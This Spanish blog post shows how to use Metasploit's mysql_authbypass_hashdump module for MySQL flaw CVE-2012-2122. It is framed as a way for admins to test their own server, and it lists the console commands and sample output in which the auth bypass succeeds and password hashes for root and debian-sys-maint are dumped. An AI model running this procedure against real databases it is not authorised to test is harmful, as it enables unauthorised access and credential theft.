Metasploit, CVE-2012-2122

En otro post hablamos del fallo de seguridad CVE-2012-2122 que afecta a MySQL y que permite obtener las credenciales de acceso sin tener acceso. La gente de metasploit no tardó mucho en sacar un pequeño código ruby que permite explotar dicha vulnerabilidad.
A continuación vamos a ver cómo usarlo para comprobar si nuestro motor de base de datos es vulnerable o no. En caso de que sea, ya sabéis, toca actualizar!
shell> msfconsole
msf> search mysql

Matching Modules
================
Name                                               Description
----                                               ------------------------
auxiliary/admin/mysql/mysql_enum                   MySQL Enumeration Module
auxiliary/admin/mysql/mysql_sql                    MySQL SQL Generic Query
auxiliary/admin/tikiwiki/tikidblib                 TikiWiki information...
auxiliary/analyze/jtr_mysql_fast                   John the Ripper MySQL
auxiliary/scanner/mysql/mysql_authbypass_hashdump  MYSQL CVE-2012-2122...
auxiliary/scanner/mysql/mysql_hashdump             MYSQL Password Hashdump
auxiliary/scanner/mysql/mysql_login                MySQL Login Utility
auxiliary/scanner/mysql/mysql_schemadump           MYSQL Schema Dump
auxiliary/scanner/mysql/mysql_version              MySQL Server Version...
exploit/linux/mysql/mysql_yassl_getname            MySQL yaSSL...
exploit/linux/mysql/mysql_yassl_hello              MySQL yaSSL...
exploit/windows/mysql/mysql_payload                Oracle MySQL...
exploit/windows/mysql/mysql_yassl_hello            MySQL yaSSL...
post/linux/gather/enum_configs                     Linux Gather...
post/linux/gather/enum_users_history               Linux Gather User...

msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump)> show options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name      Setting    Required  Description
----      -------    --------  -----------
RHOSTS               yes       The target address range or CIDR identifier
RPORT     3306       yes       The target port
THREADS   1          yes       The number of concurrent threads
USERNAME             no        The username to authenticate as

msf auxiliary(mysql_authbypass_hashdump)> set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump)> set USERNAME root
USERNAME => root
msf auxiliary(mysql_authbypass_hashdump)> show options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name      Setting    Required  Description
----      -------    --------  -----------
RHOSTS    127.0.0.1  yes       The target address range or CIDR identifier
RPORT     3306       yes       The target port
THREADS   1          yes       The number of concurrent threads
USERNAME  root       no        The username to authenticate as
La salida para un MySQL vulnerable será similar a ésta:
msf auxiliary(mysql_authbypass_hashdump)> run
 
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Y la salida para uno no vulnerable, tal que así,
msf auxiliary(mysql_authbypass_hashdump)> run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Authentication bypass is 30% complete
[*] 127.0.0.1:3306 Authentication bypass is 40% complete
[*] 127.0.0.1:3306 Authentication bypass is 50% complete
[*] 127.0.0.1:3306 Authentication bypass is 60% complete
[*] 127.0.0.1:3306 Authentication bypass is 70% complete
[*] 127.0.0.1:3306 Authentication bypass is 80% complete
[*] 127.0.0.1:3306 Authentication bypass is 90% complete
[*] 127.0.0.1:3306 Authentication bypass is 100% complete
[-] 127.0.0.1:3306 Unable to bypass authentication, this target may not be vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios